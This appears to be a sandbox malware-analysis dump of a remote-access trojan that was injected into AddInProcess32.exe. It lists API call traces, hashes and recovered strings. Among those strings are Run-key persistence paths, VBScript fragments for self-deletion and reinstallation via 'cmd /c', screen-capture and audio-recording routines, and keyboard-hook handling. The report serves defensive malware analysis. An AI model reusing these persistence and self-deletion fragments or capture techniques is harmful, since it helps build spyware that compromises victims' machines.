                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  APIs
                                                                                    • Part of subcall function 00445725: GetLastError.KERNEL32(00000020,?,00438595,?,?,?,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B), ref: 00445729
                                                                                    • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                                                                                    • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B,?,00000041,00000000,00000000), ref: 0044579D
                                                                                    • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                                                                                    • Part of subcall function 00445725: _free.LIBCMT ref: 00445784
                                                                                    • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B,?,00000041,00000000,00000000), ref: 00445791
                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044F547
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  APIs
                                                                                    • Part of subcall function 00445725: GetLastError.KERNEL32(00000020,?,00438595,?,?,?,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B), ref: 00445729
                                                                                    • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                                                                                    • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B,?,00000041,00000000,00000000), ref: 0044579D
                                                                                    • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                                                                                  • EnumSystemLocalesW.KERNEL32(0044F2A3,00000001,00000000,?,00441F7E,?,0044F8D0,00000000,?,?,?), ref: 0044F1ED
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  APIs
                                                                                    • Part of subcall function 00445725: GetLastError.KERNEL32(00000020,?,00438595,?,?,?,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B), ref: 00445729
                                                                                    • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                                                                                    • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B,?,00000041,00000000,00000000), ref: 0044579D
                                                                                    • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                                                                                  • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0044F4C1,00000000,00000000,?), ref: 0044F74F
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  APIs
                                                                                    • Part of subcall function 00445725: GetLastError.KERNEL32(00000020,?,00438595,?,?,?,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B), ref: 00445729
                                                                                    • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                                                                                    • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B,?,00000041,00000000,00000000), ref: 0044579D
                                                                                    • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                                                                                  • EnumSystemLocalesW.KERNEL32(0044F4F3,00000001,?,?,00441F7E,?,0044F894,00441F7E,?,?,?,?,?,00441F7E,?,?), ref: 0044F262
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  APIs
                                                                                    • Part of subcall function 00442D9A: EnterCriticalSection.KERNEL32(-0006A42D,?,004404DB,00000000,0046B4D8,0000000C,00440496,?,?,?,00443038,?,?,004457DA,00000001,00000364), ref: 00442DA9
                                                                                  • EnumSystemLocalesW.KERNEL32(004458CE,00000001,0046B680,0000000C), ref: 0044594C
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  APIs
                                                                                    • Part of subcall function 00445725: GetLastError.KERNEL32(00000020,?,00438595,?,?,?,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B), ref: 00445729
                                                                                    • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                                                                                    • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B,?,00000041,00000000,00000000), ref: 0044579D
                                                                                    • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                                                                                  • EnumSystemLocalesW.KERNEL32(0044F087,00000001,?,?,?,0044F8F2,00441F7E,?,?,?,?,?,00441F7E,?,?,?), ref: 0044F167
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  APIs
                                                                                  • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,00413F34,00471E78,00472910,00471E78,00000000,00471E78,00000000,00471E78,3.8.0 Pro), ref: 0040E2CF
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  APIs
                                                                                  • SetUnhandledExceptionFilter.KERNEL32(Function_00032908,0043262F), ref: 00432901
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                                  • Instruction ID: 656262e35da032ffd0a077b83a64e39d55d78725ba1fa3deec4bc033c2bd9230
                                                                                  • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                                  • Instruction Fuzzy Hash: 21C1C1322059930ADF2D4639853503FFBE15AA67B171A2B6FD4B7CB2C4FE28C524D624
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                                  • Instruction ID: 83a77ad86d3d882556a1d1f8a871d3d99dabfb51986f73d2778cf32764f6a177
                                                                                  • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                                  • Instruction Fuzzy Hash: 7FC1E3322055930ADF2D8639C53103FBBE15AA67B171B676FD4B6CB2C4FE28C524D624
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                                  • Instruction ID: 2e2fcf76ea68e3d1ce03a604506cc299a951e5de5e734e711f809c72e20f7287
                                                                                  • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                                  • Instruction Fuzzy Hash: 12C1C2322059934ADF2D4639857103FBBE15EA67B1B1A276FD4B7CB2C0FE28C524D624
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                  • Instruction ID: cc9b1a5688ee457b4940033b23912546db57db7e3d6d8e70cc9d87b8c0cd44da
                                                                                  • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                  • Instruction Fuzzy Hash: 25C1F6322059930ADF2D463AC53113FBBE15AA57B171A276FD8B7CB2C4FE28C524C614
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 9dbd819e4762da8de2df7c29e8d62f25da32584a941b05635a818d123c504815
                                                                                  • Instruction ID: d47e39d1b20c68f472f2cbcbc0b1e5e76a9f7a6e19272067298aabf3f738eb94
                                                                                  • Opcode Fuzzy Hash: 9dbd819e4762da8de2df7c29e8d62f25da32584a941b05635a818d123c504815
                                                                                  • Instruction Fuzzy Hash: E1B184791142998ACB05EF68C4913F63BA1EF6A300F0850B9EC9CCF757E3398506EB64
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a25cfcba4cb24fdf0fe01b1cfb0217293a2d97f1f2c5caf2e195f2ab18ef9283
                                                                                  • Instruction ID: ae92f65c41008aac329c7d646b8d99fb38e08d933e524e45c1d49ddbea67f2dd
                                                                                  • Opcode Fuzzy Hash: a25cfcba4cb24fdf0fe01b1cfb0217293a2d97f1f2c5caf2e195f2ab18ef9283
                                                                                  • Instruction Fuzzy Hash: 36616671E00B0866DA389A2968927BF2795DB2D708F14392FF483DF3C1C66D9D42C65E
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 5939193a035a9f71e1be9e8e65b71e813b2798266dd155f684168ca2d02e33de
                                                                                  • Instruction ID: 723622f834e47c23106d271d0d88d1dc321cab027353f38a50b8b0e2426ac40f
                                                                                  • Opcode Fuzzy Hash: 5939193a035a9f71e1be9e8e65b71e813b2798266dd155f684168ca2d02e33de
                                                                                  • Instruction Fuzzy Hash: D4518BB1E0864457DF38A9A976557BFA7899B4D304F18391FD882D7382C60CED06C31E
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 2c66de2964dbf7c0103d26a637bb9c3df90e686996b70b361c2c57e4183adb73
                                                                                  • Instruction ID: 66342361016897109e24a26c448f772de671845df11bd1e198e526645aade2d2
                                                                                  • Opcode Fuzzy Hash: 2c66de2964dbf7c0103d26a637bb9c3df90e686996b70b361c2c57e4183adb73
                                                                                  • Instruction Fuzzy Hash: CD518970E10A0556DB394969B9957BF379A9F1E304F18380FE842DB382C28CDD06D35E
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 52996d606e7b7a479a496c7ab7b6ff000045ef0ea2a1f95204311ebe95ed7444
                                                                                  • Instruction ID: 6d2995492066a9b16b195f6531796c1ccffa7af2014367dacfc1c2128089f42d
                                                                                  • Opcode Fuzzy Hash: 52996d606e7b7a479a496c7ab7b6ff000045ef0ea2a1f95204311ebe95ed7444
                                                                                  • Instruction Fuzzy Hash: 49617F326083049FC304DF75E482A5FB7E4AFCC718F450E2EF49996251E774EA088B86
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                  • Instruction ID: 3c347dad04b4a8ced02cdc3a1d1f73fe72ec142e803a1f09a224371d112cc28a
                                                                                  • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                  • Instruction Fuzzy Hash: E811297720104373E6158A2DF4B86B7A7A5EACD320F2FE377C0424B75CC12AD5559508
                                                                                  APIs
                                                                                  • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00416E98
                                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 00416EA5
                                                                                    • Part of subcall function 004172DF: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 0041730F
                                                                                  • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00416F1B
                                                                                  • DeleteDC.GDI32(00000000), ref: 00416F32
                                                                                  • DeleteDC.GDI32(00000000), ref: 00416F35
                                                                                  • DeleteObject.GDI32(00000000), ref: 00416F38
                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00416F59
                                                                                  • DeleteDC.GDI32(00000000), ref: 00416F6A
                                                                                  • DeleteDC.GDI32(00000000), ref: 00416F6D
                                                                                  • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00416F91
                                                                                  • GetIconInfo.USER32(?,?), ref: 00416FC5
                                                                                  • DeleteObject.GDI32(?), ref: 00416FF4
                                                                                  • DeleteObject.GDI32(?), ref: 00417001
                                                                                  • DrawIcon.USER32(00000000,?,?,?), ref: 0041700E
                                                                                  • GetObjectA.GDI32(00000000,00000018,?), ref: 00417026
                                                                                  • LocalAlloc.KERNEL32(00000040,00000001), ref: 00417095
                                                                                  • GlobalAlloc.KERNEL32(00000000,?), ref: 00417104
                                                                                  • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00417128
                                                                                  • DeleteDC.GDI32(?), ref: 0041713C
                                                                                  • DeleteDC.GDI32(00000000), ref: 0041713F
                                                                                  • DeleteObject.GDI32(00000000), ref: 00417142
                                                                                  • GlobalFree.KERNEL32(?), ref: 0041714D
                                                                                  • DeleteObject.GDI32(00000000), ref: 00417201
                                                                                  • GlobalFree.KERNEL32(?), ref: 00417208
                                                                                  • DeleteDC.GDI32(?), ref: 00417218
                                                                                  • DeleteDC.GDI32(00000000), ref: 00417223
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIcon$BitmapBitsDisplayDrawEnumInfoLocalSelectSettingsStretch
                                                                                  • String ID: DISPLAY
                                                                                  • API String ID: 479521175-865373369
                                                                                  APIs
                                                                                    • Part of subcall function 004112B5: TerminateProcess.KERNEL32(00000000,004721E8,0040E2B2), ref: 004112C5
                                                                                    • Part of subcall function 004112B5: WaitForSingleObject.KERNEL32(000000FF), ref: 004112D8
                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C0D6
                                                                                  • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C0E9
                                                                                  • SetFileAttributesW.KERNEL32(?,00000080), ref: 0040C102
                                                                                  • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040C132
                                                                                    • Part of subcall function 0040A7F2: TerminateThread.KERNEL32(Function_00009305,00000000,004721E8,0040BC76,?,00472200,pth_unenc,004721E8), ref: 0040A801
                                                                                    • Part of subcall function 0040A7F2: UnhookWindowsHookEx.USER32(?), ref: 0040A811
                                                                                    • Part of subcall function 0040A7F2: TerminateThread.KERNEL32(004092EF,00000000,?,00472200,pth_unenc,004721E8), ref: 0040A823
                                                                                    • Part of subcall function 0041A17B: CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,0041A29A,00000000,00000000,?), ref: 0041A1BA
                                                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 0040C37D
                                                                                  • ExitProcess.KERNEL32 ref: 0040C389
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                  • String ID: """, 0$")$CreateObject("WScript.Shell").Run "cmd /c ""$H"G$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$t<F$wend$while fso.FileExists("
                                                                                  • API String ID: 1861856835-1953526029
                                                                                  APIs
                                                                                  • CreateMutexA.KERNEL32(00000000,00000001,00000000,00472200,00471FFC,00000000), ref: 00410EF9
                                                                                  • ExitProcess.KERNEL32(00000000), ref: 00410F05
                                                                                  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00410F7F
                                                                                  • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00410F8E
                                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00410F99
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00410FA0
                                                                                  • GetCurrentProcessId.KERNEL32 ref: 00410FA6
                                                                                  • PathFileExistsW.SHLWAPI(?), ref: 00410FD7
                                                                                  • GetTempPathW.KERNEL32(00000104,?), ref: 0041103A
                                                                                  • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 00411054
                                                                                  • lstrcatW.KERNEL32(?,.exe), ref: 00411066
                                                                                    • Part of subcall function 0041A17B: CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,0041A29A,00000000,00000000,?), ref: 0041A1BA
                                                                                  • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 004110A6
                                                                                  • Sleep.KERNEL32(000001F4), ref: 004110E7
                                                                                  • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 004110FC
                                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00411107
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0041110E
                                                                                  • GetCurrentProcessId.KERNEL32 ref: 00411114
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                                                                                  • String ID: (#G$.exe$H"G$WDH$exepath$open$temp_
                                                                                  APIs
                                                                                  • _wcslen.LIBCMT ref: 0040B882
                                                                                  • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,00471FFC), ref: 0040B89B
                                                                                  • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe,00000000,00000000,00000000,00000000,00000000,?,00471FFC), ref: 0040B952
                                                                                  • _wcslen.LIBCMT ref: 0040B968
                                                                                  • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe,00000000,00000000,00000000), ref: 0040B9E0
                                                                                  • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BA22
                                                                                  • _wcslen.LIBCMT ref: 0040BA25
                                                                                  • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BA3C
                                                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 0040BC2A
                                                                                  • ExitProcess.KERNEL32 ref: 0040BC36
                                                                                  • API ID: File$_wcslen$AttributesCopy$CreateDirectoryExecuteExitProcessShell
                                                                                  • String ID: """, 0$6$C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe$CreateObject("WScript.Shell").Run "cmd /c ""$Set fso = CreateObject("Scripting.FileSystemObject")$Temp$WScript.Sleep 1000$\install.vbs$fso.DeleteFile $fso.DeleteFile(Wscript.ScriptFullName)$open$!G$!G
                                                                                  APIs
                                                                                    • Part of subcall function 004112B5: TerminateProcess.KERNEL32(00000000,004721E8,0040E2B2), ref: 004112C5
                                                                                    • Part of subcall function 004112B5: WaitForSingleObject.KERNEL32(000000FF), ref: 004112D8
                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,00472200,pth_unenc,004721E8), ref: 0040BD63
                                                                                  • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040BD76
                                                                                  • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,00472200,pth_unenc,004721E8), ref: 0040BDA6
                                                                                  • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,00472200,pth_unenc,004721E8), ref: 0040BDB5
                                                                                    • Part of subcall function 0040A7F2: TerminateThread.KERNEL32(Function_00009305,00000000,004721E8,0040BC76,?,00472200,pth_unenc,004721E8), ref: 0040A801
                                                                                    • Part of subcall function 0040A7F2: UnhookWindowsHookEx.USER32(?), ref: 0040A811
                                                                                    • Part of subcall function 0040A7F2: TerminateThread.KERNEL32(004092EF,00000000,?,00472200,pth_unenc,004721E8), ref: 0040A823
                                                                                    • Part of subcall function 00419959: GetCurrentProcessId.KERNEL32(00000000,75923530,00000000,?,?,?,?,00469654,0040BDCB,.vbs,?,?,?,?,?,00472200), ref: 00419980
                                                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 0040BFD0
                                                                                  • ExitProcess.KERNEL32 ref: 0040BFD7
                                                                                  • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                  • String ID: ")$.vbs$H"G$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("
                                                                                  APIs
                                                                                  • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 004190F2
                                                                                  • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 00419106
                                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,00463050), ref: 0041912E
                                                                                  • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00471E78,00000000), ref: 00419144
                                                                                  • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 00419185
                                                                                  • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041919D
                                                                                  • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 004191B2
                                                                                  • SetEvent.KERNEL32 ref: 004191CF
                                                                                  • WaitForSingleObject.KERNEL32(000001F4), ref: 004191E0
                                                                                  • CloseHandle.KERNEL32 ref: 004191F0
                                                                                  • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 00419212
                                                                                  • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041921C
                                                                                  • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                                                  • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped
                                                                                  APIs
                                                                                  • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AB9
                                                                                  • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401AE3
                                                                                  • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401AF3
                                                                                  • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B03
                                                                                  • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B13
                                                                                  • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B23
                                                                                  • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B34
                                                                                  • WriteFile.KERNEL32(00000000,0046FA9A,00000002,00000000,00000000), ref: 00401B45
                                                                                  • WriteFile.KERNEL32(00000000,0046FA9C,00000004,00000000,00000000), ref: 00401B55
                                                                                  • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B65
                                                                                  • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B76
                                                                                  • WriteFile.KERNEL32(00000000,0046FAA6,00000002,00000000,00000000), ref: 00401B87
                                                                                  • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401B97
                                                                                  • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BA7
                                                                                  • API ID: File$Write$Create
                                                                                  • String ID: RIFF$WAVE$data$fmt
                                                                                  APIs
                                                                                  • API ID: _free$EnvironmentVariable$_wcschr
                                                                                  APIs
                                                                                  • ___free_lconv_mon.LIBCMT ref: 0044E4EA
                                                                                    • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D6FF
                                                                                    • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D711
                                                                                    • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D723
                                                                                    • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D735
                                                                                    • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D747
                                                                                    • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D759
                                                                                    • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D76B
                                                                                    • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D77D
                                                                                    • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D78F
                                                                                    • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D7A1
                                                                                    • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D7B3
                                                                                    • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D7C5
                                                                                    • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D7D7
                                                                                  • _free.LIBCMT ref: 0044E4DF
                                                                                    • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
                                                                                    • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
                                                                                  • _free.LIBCMT ref: 0044E501
                                                                                  • _free.LIBCMT ref: 0044E516
                                                                                  • _free.LIBCMT ref: 0044E521
                                                                                  • _free.LIBCMT ref: 0044E543
                                                                                  • _free.LIBCMT ref: 0044E556
                                                                                  • _free.LIBCMT ref: 0044E564
                                                                                  • _free.LIBCMT ref: 0044E56F
                                                                                  • _free.LIBCMT ref: 0044E5A7
                                                                                  • _free.LIBCMT ref: 0044E5AE
                                                                                  • _free.LIBCMT ref: 0044E5CB
                                                                                  • _free.LIBCMT ref: 0044E5E3
                                                                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                  • String ID: pF
                                                                                  APIs
                                                                                  • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0041382B
                                                                                  • LoadLibraryA.KERNEL32(?), ref: 0041386D
